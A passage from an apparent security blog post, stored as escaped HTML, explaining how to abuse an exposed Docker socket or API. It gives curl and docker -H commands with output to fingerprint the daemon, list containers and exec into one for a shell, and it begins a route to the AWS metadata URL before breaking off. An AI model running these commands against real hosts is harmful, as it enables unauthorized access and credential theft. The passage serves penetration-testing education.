href=\"https:\/\/medium.com\/@riccardo.ancarani94\/attacking-docker-exposed-api-3e01ffc3c124\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/medium.com\/@riccardo.ancarani94\/attacking-docker-exposed-api-3e01ffc3c124\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.exploit-db.com\/exploits\/42356\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.exploit-db.com\/exploits\/42356\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/docker_daemon_tcp.rb\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/docker_daemon_tcp.rb\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/blog.nibblesec.org\/2014\/09\/abusing-dockers-remote-apis.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/blog.nibblesec.org\/2014\/09\/abusing-dockers-remote-apis.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.prodefence.org\/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers\/\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.prodefence.org\/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers\/\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/blog.ropnop.com\/plundering-docker-images\/\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.ropnop.com\/plundering-docker-images\/\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEnable docker socket (Create practice locations)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/success.docker.com\/article\/how-do-i-enable-the-remote-api-for-dockerd\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/success.docker.com\/article\/how-do-i-enable-the-remote-api-for-dockerd\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EHaving the docker API | socket exposed is essentially granting root to any of the containers on the system\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe daemon listens on unix:\/\/\/var\/run\/docker.sock but you can bind Docker to another host\/port or a Unix socket.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe docker socket\u0026nbsp; is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAll the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we'd do the below:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003ECreate a nginx container\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe following command uses curl to send the {“Image”:”nginx”} payload to the \/containers\/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E$ curl -XPOST --unix-socket \/var\/run\/docker.sock -d '{\"Image\":\"nginx\"}' -H 'Content-Type: application\/json' http:\/\/localhost\/containers\/create\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\"Id\":\"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65\",\"Warnings\":null}\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EStart the container\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;$ curl -XPOST --unix-socket \/var\/run\/docker.sock http:\/\/localhost\/containers\/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65\/start\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAs mentioned above you can also have the docker socket listen on a TCP port\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou can validate it's docker by hitting it with a version request\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;$ curl -s http:\/\/open.docker.socket:2375\/version | jq\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E{\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Version\": \"1.13.1\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"ApiVersion\": \"1.26\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"MinAPIVersion\": \"1.12\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"GitCommit\": \"07f3374\/1.13.1\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"GoVersion\": \"go1.9.4\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Os\": \"linux\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"Arch\": \"amd64\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"KernelVersion\": \"3.10.0-514.26.2.el7.x86_64\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"BuildTime\": \"2018-12-07T16:13:51.683697055+00:00\",\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; \"PkgVersion\": \"docker-1.13.1-88.git07f3374.el7.centos.x86_64\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E}\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;or with the docker client\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edocker -H\u0026nbsp; open.docker.socket:2375 version\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;Server:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp;Engine:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; Version:\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.13.1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; API version:\u0026nbsp; \u0026nbsp; \u0026nbsp; 1.26 (minimum version 1.12)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; Go version:\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;go1.9.4\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; Git commit:\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;07f3374\/1.13.1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; Built:\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Fri Dec\u0026nbsp; 7 16:13:51 2018\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; OS\/Arch:\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; linux\/amd64\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; Experimental:\u0026nbsp; \u0026nbsp; \u0026nbsp;false\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis is basically a shell into the container\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003EGet a list of running containers with the ps command\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Edocker -H\u0026nbsp; open.docker.socket:2375 ps\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003ECONTAINER ID\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; IMAGE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;COMMAND\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; CREATED\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;STATUS\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; PORTS\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;NAMES\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E72cd30d28e5c\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; gogs\/gogs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;\"\/app\/gogs\/docker\/st…\"\u0026nbsp; \u0026nbsp;5 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 5 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0.0.0.0:3000-\u0026gt;3000\/tcp, 0.0.0.0:10022-\u0026gt;22\/tcp\u0026nbsp; \u0026nbsp;gogs\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eb522a9034b30\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; jdk1.8\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"\/bin\/bash\"\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 5 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 5 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;myjdk8\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cb\u003E0f5947860c17\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; centos\/mysql-57-centos7\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;\"container-entrypoin…\"\u0026nbsp; \u0026nbsp;8 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 8 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0.0.0.0:3306-\u0026gt;3306\/tcp\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; mysql\u003C\/b\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E3965c004c7a7\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 192.168.32.134:5000\/tensquare_config:1.0-SNAPSHOT\u0026nbsp; \u0026nbsp;\"java -jar \/app.jar\"\u0026nbsp; \u0026nbsp; \u0026nbsp;8 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 8 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0.0.0.0:12000-\u0026gt;12000\/tcp\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; config\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E3f466b754971\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 42cb59080921\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"\/bin\/bash\"\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 8 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 8 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;jdk8\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E6499013fdc2d\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; registry\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"\/entrypoint.sh \/etc…\"\u0026nbsp; \u0026nbsp;8 days ago\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Up 8 days\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0.0.0.0:5000-\u0026gt;5000\/tcp\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; registry\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EExec into one of the containers\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edocker -H\u0026nbsp; open.docker.socket:2375 exec -it mysql \/bin\/bash\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ebash-4.2$ whoami\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Emysql\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EOther commands\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EAre there some stopped containers?\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edocker -H open.docker.socket:2375 ps -a\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhat are the images pulled on the host machine?\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edocker -H open.docker.socket:2375 images\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EI've frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API.\u0026nbsp; The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003EUsing curl to hit the API\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003ESometimes you'll see 2376 up for the TLS endpoint.\u0026nbsp; I haven't been able to connect to it with the docker client but you can with curl no problem to hit the docker API.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EDocker socket to metadata URL\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/docs.docker.com\/engine\/api\/v1.37\/#operation\/ContainerExec\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/docs.docker.com\/engine\/api\/v1.37\/#operation\/ContainerExec\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EBelow is an example of hitting the internal AWS metadata URL and getting the output\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cb\u003E\u003Cspan style=\"color: #444444;\"\u003Elist containers:\u003C\/span\u003E\u003C\/b\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Ecurl --insecure https:\/\/tls-opendocker.socker:2376\/containers\/json | jq\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E[\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u0026nbsp; {\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: 